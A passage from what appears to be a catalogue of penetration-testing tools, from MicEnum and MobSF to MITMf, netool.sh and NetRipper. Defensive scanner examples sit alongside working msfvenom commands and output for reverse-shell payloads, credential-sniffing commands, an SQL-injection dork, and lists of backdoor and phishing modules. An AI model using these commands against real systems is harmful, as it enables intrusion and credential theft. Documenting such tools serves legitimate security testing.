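    return levels


def find_anomalies(levels):
    """Objects whose level differs from their parent's, with direction of change.

    Returns (path, parent_level, level, 'raised'|'lowered') tuples in listing order.
    Objects whose parent is not in the listing (the scan root) are skipped."""
    out = []
    for path, level in levels.items():
        parent = ntpath.dirname(path)
        if parent not in levels or levels[parent] == level:
            continue
        change = "raised" if LEVELS.index(level) > LEVELS.index(levels[parent]) else "lowered"
        out.append((path, levels[parent], level, change))
    return out


if __name__ == "__main__":
    for path, parent_level, level, change in find_anomalies(parse_icacls(SAMPLE_ICACLS)):
        print(f"{change:7} {path}: {parent_level} -> {level}")
```

A label lowered on a folder (temp here) is often legitimate, for instance a browser's Low-integrity writable area, while an executable sitting at a higher level than its parent or a file inside a Low folder that lost its Low label are the cases worth a closer look; the tool only spots the difference, the analyst decides.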

MicEnum scanning a Windows registry branch

For setting new integrity levels, just use the contextual menu again and set the desired level. Do not change them if you do not know what you are doing. You may need administrator privileges to achieve the change.

The program allows setting different integrity levels

For forensic purposes, the whole "session" or information about the integrity levels may be saved as an XML file. Later you may restore it with this same tool. Once restored, icons are missing, and there is no way to set new values, of course, since you are not using your "live" hard disk.

If a session is loaded, the different values are shown

This all applies to registry branches as well, in its corresponding tab.
MicEnum is inspired by AccessEnum, a classic tool by Sysinternals that enumerates NTFS permissions and helps detect anomalies.

Download MicEnum
MITMF - FRAMEWORK FOR MAN-IN-THE-MIDDLE ATTACKS

Framework for Man-In-The-Middle attacks

Available plugins
SMBtrap - Exploits the 'SMB Trap' vulnerability on connected clients
Screenshotter - Uses HTML5 Canvas to render an accurate screenshot of a client's browser
Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
BeEFAutorun - Autoruns BeEF modules based on a client's OS or browser type
AppCachePoison - Perform app cache poisoning attacks
Ferret-NG - Transparently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
jskeylogger - Injects a Javascript keylogger into a client's webpages
Replace - Replace arbitrary content in HTML content
SMBAuth - Evoke SMB challenge-response authentication attempts
Upsidedownternet - Flips images 180 degrees

How to install on Kali
apt-get install mitmf

Installation
If MITMf is not in your distro's repo or you just want the latest version:
Run the command git clone https://github.com/byt3bl33d3r/MITMf.git to clone this directory
Run the setup.sh script
Run the command pip install --upgrade -r requirements.txt to install all Python dependencies
On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ImportError: no module named pcap, run apt-get install python-pypcap to fix it

Download MITMf
MOBAXTERM - TERMINAL FOR WINDOWS WITH X11 SERVER, TABBED SSH CLIENT, NETWORK TOOLS AND MUCH MORE...

MobaXterm is your ultimate toolbox for remote computing. In a single Windows application, it provides loads of functions that are tailored for programmers, webmasters, IT administrators and pretty much all users who need to handle their remote jobs in a simpler fashion.
MobaXterm provides all the important remote network tools (SSH, X11, RDP, VNC, FTP, MOSH, ...) and Unix commands (bash, ls, cat, sed, grep, awk, rsync, ...) to the Windows desktop, in a single portable exe file which works out of the box.
There are many advantages to having an all-in-one network application for your remote tasks, e.g. when you use SSH to connect to a remote server, a graphical SFTP browser will automatically pop up in order to directly edit your remote files. Your remote applications will also display seamlessly on your Windows desktop using the embedded X server.
You can download and use MobaXterm Home Edition for free. If you want to use it inside your company, you should consider subscribing to MobaXterm Professional Edition: this will give you access to many more features, professional support and the "Customizer" software.
When developing MobaXterm, we focused on a simple aim: proposing an intuitive user interface in order for you to efficiently access remote servers through different networks or systems.
Key features
Embedded X server: Fully configured X server based on X.org
Easy DISPLAY exportation: DISPLAY is exported from the remote Unix host to local Windows
X11-Forwarding capability: Your remote display uses SSH for secure transport
Tabbed terminal with SSH: Based on PuTTY/MinTTY with antialiased fonts and macro support
Many Unix/Linux commands on Windows: Includes basic Cygwin commands (bash, grep, awk, sed, rsync, ...)
Add-ons and plugins: You can extend MobaXterm capabilities with plugins
Versatile session manager: All your network tools in one app: Rdp, Vnc, Ssh, Mosh, X11, ...
Portable and light application: MobaXterm has been packaged as a single executable which does not require admin rights and which you can start from a USB stick
Professional application: MobaXterm Professional has been designed for security and stability for very demanding users
MobaXterm plugins
Corkscrew: Corkscrew allows to tunnel TCP connections through HTTP proxies
Curl: Curl is a command line tool for transferring data with URL syntax
CvsClient: A command line tool to access CVS repositories
Gcc, G++ and development tools: the GNU C/C++ compiler
and other development tools
DnsUtils: This plugin includes some useful utilities for host
name resolution:
dig, host, nslookup and nsupdate.
E2fsProgs: Utilities for creating, fixing, configuring, and
debugging ext2/3/4 filesystems.
Emacs: The extensible, customizable, self-documenting realtime display editor
Exif: Command-line utility to show EXIF information hidden in
JPEG files.
FVWM2: A light but powerful window manager for X11.
File: Determines file type using magic numbers.
Fontforge: A complete font editor with many features
GFortran: The GNU Fortran compiler.
Git: A fast and powerful version control system.
Gvim: The Vim editor with a GTK interface
Httperf: A tool for measuring web server performance.
Joe: Fast and simple editor which emulates 5 other editors.
Lftp: Sophisticated file transfer program and ftp/http/bittorrent client.
Lrzsz: Unix communication package providing the XMODEM, YMODEM and ZMODEM file transfer protocols.
Lynx: A text-mode web browser.
MPlayer: The ultimate video player
Midnight Commander: Midnight Commander is a feature rich
text mode visual file manager.
Mosh: MOSH has been included into MobaXterm main
executable in version 7.1 directly in the sessions manager. This
plugin is deprecated.
Multitail: Program for monitoring multiple log files, in the
fashion of the original tail program.
NEdit: NEdit is a multi-purpose text editor for the X Window
System.
Node.js: Node.js is a platform built on Chrome's JavaScript
runtime for easily building fast, scalable network applications.
This plugin does not include NPM.
OpenSSL: A toolkit implementing SSL v2/v3 and TLS
protocols.
PdKsh: A KSH shell open-source implementation.
Perl: Larry Wall's Practical Extracting and Report Language
Png2Ico: Png2Ico Converts PNG files to Windows icon
resource files.
Python: An interpreted, interactive object-oriented
programming language.
Ruby: Interpreted object-oriented scripting language.
Screen: Screen is a terminal multiplexer and window manager
that runs many separate 'screens' on a single physical
character-based terminal.
Sqlite3: Software library that implements a self-contained,
serverless, zero-configuration, transactional SQL database
engine.
SquashFS: mksquashfs and unsquashfs tools allow you to
create/unpack squashfs filesystems from Windows.
Subversion (SVN): Subversion is a powerful version control system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful
language. Tk is its graphical toolkit. Expect is an automation
tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11
servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this
plugin if you have trouble connecting to an old Unix station
through XDMCP.
Zip: Zip compression utility.

DownloadMobaXterm
MOBSF (MOBILE SECURITY FRAMEWORK) - MOBILE (ANDROID/IOS) AUTOMATED PEN-TESTING FRAMEWORK

Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-testing, and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS applications. It supports binaries (APK & IPA) and zipped source code.
The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code like SSL overriding, SSL bypass, weak crypto, obfuscated code, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack traces, and on the application assets like settings files, preferences, and databases. This framework is highly scalable, so that you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, Windows Phone etc. in future.
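Static rules of the kind the analyzer applies (SSL bypass, weak crypto, hardcoded secrets, world-readable storage, sensitive data in logs) are, at their simplest, regular expressions matched line by line over decompiled or zipped source. The block below is an added example written for this page, not MobSF's rule set or code: the Java snippet is constructed to trigger each rule, and the rule ids, patterns and severities are this example's own assumptions. It also shows where such rules stop: the secret rule matches an assignment of a long string literal but not the concatenation on the logging line, which a separate logging rule has to catch.

```python
"""Rule-driven static analysis of Android source, in the spirit of MobSF's static analyzer.

Added example, not MobSF's rules. The Java below is constructed to trigger each
rule; rule ids, patterns and severities are assumptions of this example.
"""
import re

SAMPLE_JAVA = """
package com.example.app;

public class NetHelper {
    private static final String API_KEY = "AKIAIOSFODNN7EXAMPLE";

    static TrustManager[] trustAll = new TrustManager[]{ new X509TrustManager() {
        public void checkServerTrusted(X509Certificate[] chain, String authType) { }
        public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        public X509Certificate[] getAcceptedIssuers() { return null; }
    }};

    void connect() throws Exception {
        SSLSocketFactory sf = new SSLSocketFactory(ks);
        sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
        Cipher c = Cipher.getInstance("DES/ECB/PKCS5Padding");
        SharedPreferences p = ctx.getSharedPreferences("creds", Context.MODE_WORLD_READABLE);
        Log.d("NetHelper", "password=" + password);
    }
}
"""

# Each rule: (id, severity, compiled regex applied to one source line, description).
RULES = [
    ("SSL-001", "high", re.compile(r'checkServerTrusted\s*\([^)]*\)\s*\{\s*\}'),
     "TrustManager accepts every server certificate (SSL bypass)"),
    ("SSL-002", "high", re.compile(r'ALLOW_ALL_HOSTNAME_VERIFIER'),
     "Hostname verification disabled"),
    ("CRYPTO-001", "medium", re.compile(r'Cipher\.getInstance\(\s*"(DES|RC4|RC2)\b'),
     "Weak cipher selected"),
    ("CRYPTO-002", "medium", re.compile(r'"[^"]*/ECB/[^"]*"'),
     "ECB mode leaks plaintext structure"),
    ("SECRET-001", "high", re.compile(r'(?i)(api_?key|secret|password)\s*=\s*"[^"]{8,}"'),
     "Hardcoded secret in a string literal"),
    ("STORAGE-001", "medium", re.compile(r'MODE_WORLD_(READABLE|WRITEABLE)'),
     "World-accessible file or shared preference"),
    ("LOG-001", "low", re.compile(r'(?i)Log\.[vdiwe]\(.*(passw|token|secret)'),
     "Sensitive data written to logcat"),
]


def scan(source, rules=RULES):
    """Return findings as (rule_id, severity, line_no, description), in line order."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for rule_id, severity, pattern, description in rules:
            if pattern.search(line):
                findings.append((rule_id, severity, line_no, description))
    return findings


def risk_summary(findings):
    """Count findings per severity, the figure a report would lead with."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for _, severity, _, _ in findings:
        counts[severity] += 1
    return counts


if __name__ == "__main__":
    results = scan(SAMPLE_JAVA)
    for rule_id, severity, line_no, description in results:
        print(f"{severity:6} L{line_no:<3} {rule_id}: {description}")
    print(risk_summary(results))
```

Line-based matching is fast and easy to extend, which is why frameworks expose custom rules this way, but it is blind to anything spread over several lines (a TrustManager whose empty body starts on the next line) and to names chosen to avoid the pattern; treat the output as a review queue, not a verdict.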
Documentation
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/wiki/Documentation

Queries
Feature requests: @ajinabraham or @OpenSecurity_IN.
Open bugs here: https://github.com/ajinabraham/YSO-Mobile-Security-Framework/issues

Screenshots and Sample Report
Static Analysis - Android APK
Static Analysis - iOS IPA
Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog
New name: Mobile Security Framework (MobSF)
Added Dynamic Analysis
VM Available for Download
Fixed RCE
Fixed Broken Manifest File Parsing Logic
Sqlite DB Support
Fixed Reporting with new PDF report
Rescan Option
Detect Root Detection
Added Requirements.txt
Automated Java Path Detection
Improved Manifest and Code Analysis
Fixed Unzipping error for Unix.
Activity Tester Module
Exported Activity Tester Module
Device API Hooker with DroidMon
SSL Certificate Pinning Bypass with JustTrustMe
RootCloak to prevent root Detection
Data Pusher to Dump Application Data
pyWebproxy to decrypt SSL Traffic
v0.8.7 Changelog
Improved Static Analysis Rules
Better AndroidManifest View
Search in Files
v0.8.6 Changelog
Detects implicitly exported component from manifest.
Added CFR decompiler support
Fixed Regex DoS on URL Regex
v0.8.5 Changelog
Bug Fix to support IPA MIME Type: application/x-itunesipa
v0.8.4 Changelog
Improved Android Static Code Analysis speed (2X
performance)
Static Code analysis on Dexguard protected APK.
Fixed a Security Issue - Email Regex DoS.
Added Logging Code.
All Browser Support.
MIME Type Bug fix to Support IE.
Fixed Progress Bar.
v0.8.3 Changelog
View AndroidManifest.xml & Info.plist

Supports iOS Binary (IPA)


Bug Fix for Linux (Ubuntu), missing MIME Type Detection
Check for Hardcoded Certificates
Added Code to prevent from Directory Traversal

Credits
Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
Thomas Abraham - For JS Hacks on UI.
Anto Joseph (@antojosep007) - For the help with SuperSU.
Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
Anant Srivastava (@anantshri) - For Activity Tester Idea

Download Mobile-Security-Framework-Mobsf
MOSCA - STATIC ANALYSIS TOOL TO FIND BUGS

Just another simple static analysis tool to find bugs, working like the Unix grep command. Mosca has modules, called eggs; each egg is a simple config to find bugs in a specific language like PHP, Ruby, ASP etc. Example egg configs are in the directory "egg". If Mosca reads a line of source code matching a vulnerability pattern from an egg, it raises an alert about the vulnerability and saves it to the logs.
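An illustration of the egg-driven, grep-style approach described above, added here as an example rather than Mosca's own code (Mosca is written in C; this is a Python sketch of the idea). The egg rule sets, rule names and sample source files are all constructed for the demonstration and do not follow Mosca's real egg file format.

```python
"""Added example, not Mosca's own code: a grep-style scanner driven by
per-language 'egg' rule sets. Each egg names the file extensions it applies
to and a set of regexes; every matching source line becomes an alert record
that a caller can write to a log."""
import re

# Constructed eggs for the demo; Mosca's real egg files use their own format.
EGGS = {
    "php": {
        "extensions": (".php",),
        "rules": {
            "eval-on-request-data": r"\beval\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b",
            "sql-built-from-request": r"(mysql_query|->query)\s*\(.*\.\s*\$_(GET|POST|REQUEST)\b",
            "shell-command": r"\b(system|exec|shell_exec|passthru|popen)\s*\(",
        },
    },
    "ruby": {
        "extensions": (".rb",),
        "rules": {
            "ruby-eval": r"\beval\s*\(",
            "backtick-with-interpolation": r"`[^`]*#\{",
        },
    },
}

# Compile every rule once so scanning large trees stays cheap.
COMPILED = {
    lang: {name: re.compile(pattern) for name, pattern in egg["rules"].items()}
    for lang, egg in EGGS.items()
}


def egg_for(filename):
    """Pick the egg whose extension list matches the file name, or None."""
    for lang, egg in EGGS.items():
        if filename.lower().endswith(egg["extensions"]):
            return lang
    return None


def scan_source(filename, text):
    """Return alerts as (filename, line_no, rule, line) for matching lines."""
    lang = egg_for(filename)
    if lang is None:
        return []  # no egg covers this file type, like grep with no pattern
    alerts = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, regex in COMPILED[lang].items():
            if regex.search(line):
                alerts.append((filename, line_no, rule, line.strip()))
    return alerts


# Constructed sample sources: deliberately insecure snippets for the demo.
SAMPLES = {
    "page.php": """<?php
$id = $_GET['id'];
$res = mysql_query("SELECT * FROM users WHERE id=" . $_GET['id']);
eval($_POST['code']);
echo htmlspecialchars($id);
""",
    "runner.rb": """def run(cmd)
  `ls #{cmd}`
end
eval(params[:expr])
""",
    "README.txt": "eval(anything) is ignored here: no egg covers .txt files\n",
}


def scan_all(sources=SAMPLES):
    """Scan every (filename, text) pair and collect the alerts."""
    alerts = []
    for filename, text in sources.items():
        alerts.extend(scan_source(filename, text))
    return alerts


if __name__ == "__main__":
    for filename, line_no, rule, line in scan_all():
        print("%s:%d [%s] %s" % (filename, line_no, rule, line))
```

Each hit is reported once per rule, so a line that trips two rules produces two alerts; a line-at-a-time matcher like this, as with grep, cannot see a sink whose tainted argument is assigned on an earlier line, which is the usual limit of the approach.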

Download Mosca
MPC - MSFVENOM PAYLOAD CREATOR

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating msfvenom & Metasploit is the end goal (well, as far as being able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and being able to enter any argument in any order (in various formats/patterns)).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
Don't know what your external IP is? MPC will discover it: wan.
Want to generate one of each payload? No issue! Try: loop.
Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will not try to bypass any anti-virus solutions.
Install

Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help
root@kali:~# mpc -h -v
[*] Msfvenom Payload Creator (MPC v1.3)
[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
[i] Example: /usr/bin/mpc windows 192.168.1.10       # Windows & manual IP.
[i]          /usr/bin/mpc elf eth0 4444               # Linux, eth0's IP & manual port.
[i]          /usr/bin/mpc stageless cmd py verbose    # Python, stageless command prompt.
[i]          /usr/bin/mpc loop eth1                   # A payload for every type, using eth1's IP.
[i]          /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
[i]          /usr/bin/mpc help verbose                # This help screen, with even more information.
[i] <TYPE>:
[i]   + ASP
[i]   + ASPX
[i]   + Bash [.sh]
[i]   + Java [.jsp]
[i]   + Linux [.elf]
[i]   + OSX [.macho]
[i]   + Perl [.pl]
[i]   + PHP
[i]   + Powershell [.ps1]
[i]   + Python [.py]
[i]   + Tomcat [.war]
[i]   + Windows [.exe]
[i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
[i] Missing <DOMAIN/IP> will default to the IP menu.
[i] Missing <PORT> will default to 443.
[i] <CMD> is a standard/native command prompt/terminal to interactive with.
[i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
[i] Missing <CMD/MSF> will default to <MSF> where possible.
[i]   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
[i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
[i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.
[i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
[i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
[i] Missing <BIND/REVERSE> will default to <REVERSE>.
[i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.
[i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
[i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
[i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
[i]   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
[i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
[i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
[i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
[i]                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
[i]                   https://www.offensive-security.com/metasploit-unleashed/payloads/
[i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
[i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
[i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
[i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
[i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
[i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
[i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication
[i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
[i] <LOOP> will just create one of each <TYPE>.
[i] <VERBOSE> will display more information.
root@kali:~#

Example #1 (Windows, Fully Automated With IP)
root@kali:~# mpc windows 192.168.1.10
[*] Msfvenom Payload Creator (MPC v1.3)
[i]   IP: 192.168.1.10
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
[i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'   (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
[?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
[*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)
root@kali:~# ./mpc elf eth0 4444
[*] Msfvenom Payload Creator (MPC v1.3)
[i]   IP: 192.168.103.238
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/reverse_tcp)
[i]  CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
[i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
[i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc'   (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
[?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
[*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)
root@kali:~# mpc stageless cmd py verbose
[*] Msfvenom Payload Creator (MPC v1.3)
[i] Use which interface/IP address?:
[i]   1.) eth0 - 192.168.103.238
[i]   2.) eth1 - 192.168.155.175
[i]   3.) tap0 - 10.10.100.63
[i]   4.) lo - 127.0.0.1
[i]   5.) wan - xx.xx.xx.xx
[?] Select 1-5, interface or IP address: 3
[i]        IP: 10.10.100.63
[i]      PORT: 443
[i]      TYPE: python (python/shell_reverse_tcp)
[i]     SHELL: shell
[i] DIRECTION: reverse
[i]     STAGE: stageless
[i]    METHOD: tcp
[i]       CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
[i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
[i] File: ASCII text, with very long lines, with no line terminators
[i] Size: 4.0K
[i]  MD5: 53452eafafe21bff94e6c4621525165b
[i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'   (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
[?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
[*] Done!
root@kali:~#

To-Do List
Shellcode generation
x64 payloads
IPv6 support
Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

Download Msfvenom Payload Creator


MYSQL QUERY BROWSER PASSWORD DUMP COMMAND-LINE TOOL TO RECOVER LOST OR
FORGOTTEN PASSWORDS FROM MYSQL QUERY
BROWSER

MySQL Query Browser Password Dump is a free command-line tool to instantly recover your lost or forgotten passwords from the MySQL Query Browser software.
MySQL Query Browser is a simple program to manage your MySQL database connections and queries. By default, it stores all the database login details so that users don't have to enter them every time.
Our tool helps you to quickly find and decode all the login username & password details for each database. For each recovered MySQL database connection, it displays the following details:
Login Username
Login Password
Database Schema
MySQL Port
MySQL Host/Server Address

It operates in both automatic and manual mode. You can ask it to auto-detect the password file from the default location of MySQL Query Browser or manually provide one. This way, you can not only recover database passwords from the local system but also from a file copied from a remote system.
Being a command-line tool makes it an ideal tool for penetration testers and forensic investigators. It is fully portable and also includes an installer to help you with local installation & uninstallation.
MySQL Query Browser Password Dump works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Download MySQL Query Browser Password Dump


NET-CREDS - SNIFF PASSWORDS AND HASHES FROM
AN INTERFACE OR PCAP FILE

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
Sniffs
URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
Kerberos

Examples
Auto-detect the interface to sniff
sudo python net-creds.py
Choose eth0 as the interface
sudo python net-creds.py -i eth0
Ignore packets to and from 192.168.0.2
sudo python net-creds.py -f 192.168.0.2
Read from pcap
python net-creds.py -p pcapfile

Download Net-creds
NETOOL.SH - MITM PENTESTING OPENSOURCE T00LKIT

The netool.sh toolkit provides a fast and easy way for newcomers to IT security pentesting, and also for experienced users, to use almost all the features that a Man-In-The-Middle position can provide on a local LAN: scanning, sniffing and social engineering attacks "[spear phishing attacks]"...

DESCRIPTION

"Scanning - Sniffing - Social Engineering"

Netool: it is a toolkit written using bash, python and ruby that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes easy tasks such as sniffing TCP/UDP traffic, Man-In-The-Middle attacks, SSL-sniffing, DNS-spoofing, DoS attacks in WAN/LAN networks and TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of the target's web browser surfing (driftnet); it also uses macchanger to decoy scans by changing the MAC address.
Rootsector: this module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using the metasploit, apache2 and ettercap frameworks, like the generation of payloads, shellcode and backdoors delivered using dns_spoof and the MitM method to redirect a target to your phishing webpage.
Recently the "inurlbr" webscanner (by cleiton) was introduced, which allows us to search for SQL related bugs using several search engines; this framework can also be used in conjunction with other frameworks like nmap (using the flag --comand-vul).

Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' -exploit-get ?0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'
Operative Systems Supported
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

Dependencies
"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip
"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl
* Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2 *
Features (modules)
"1-Show Local Connections"
"2-Nmap Scanner menu"
Ping target
Show my IP address
See/change mac address
Change my PC hostname
Scan local network
Scan external LAN for hosts
Scan a list of targets (list.txt)
Scan remote host for vulns
Execute Nmap command
Search for target geolocation
Ping of death (DoS)
Norse (cyber attacks map)
Nmap NSE vuln modules
Nmap NSE discovery modules

Retrieve metadata from target website
Retrieve using a fake user-agent
Retrieve only certain file types

Scanner inurlbr.php -> Advanced search with multiple engines; the provided analysis enables exploiting GET/POST, capturing emails/URLs & internal custom validation for each target/URL found, and also the ability to use external frameworks in conjunction with the scanner like nmap, sqlmap, etc., or simply the use of external scripts.

package.deb backdoor [Binary linux trojan]
Backdooring EXE Files [Backdooring EXE Files]
fakeupdate.exe [dns-spoof phishing backdoor]
meterpreter powershell invocation payload [by ReL1K]
host a file attack [dns_spoof+mitm-hosted file]
clone website [dns-spoof phishing keylogger]
Java.jar phishing [dns-spoof+java.jar+phishing]
clone website [dns-spoof + java-applet]
clone website [browser_autopwn phishing Iframe]
Block network access [dns-spoof]
Samsung TV DoS [Plasma TV DoS attack]
RDP DoS attack [DoS attack against target RDP]
website DoS flood [DoS attack using syn packets]
firefox_xpi_bootstrapped_addon automated exploit
PDF backdoor [insert a payload into a PDF file]
Winrar backdoor (file spoofing)
VBScript injection [embed a payload into a Word document]
".::[ normal payloads ]::."
windows.exe payload
mac osx payload
linux payload
java signed applet [multi-operative systems]
android-meterpreter [android smartphone payload]
webshell.php [webshell.php backdoor]
generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
Session hijacking [cookie hijacking]
start a listener [multi-handler]

Screenshots

Download netool.sh
NETRIPPER - SMART TRAFFIC SNIFFING FOR
PENETRATION TESTERS

NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.
NetRipper was released at Defcon 23, Las Vegas, Nevada.
Abstract

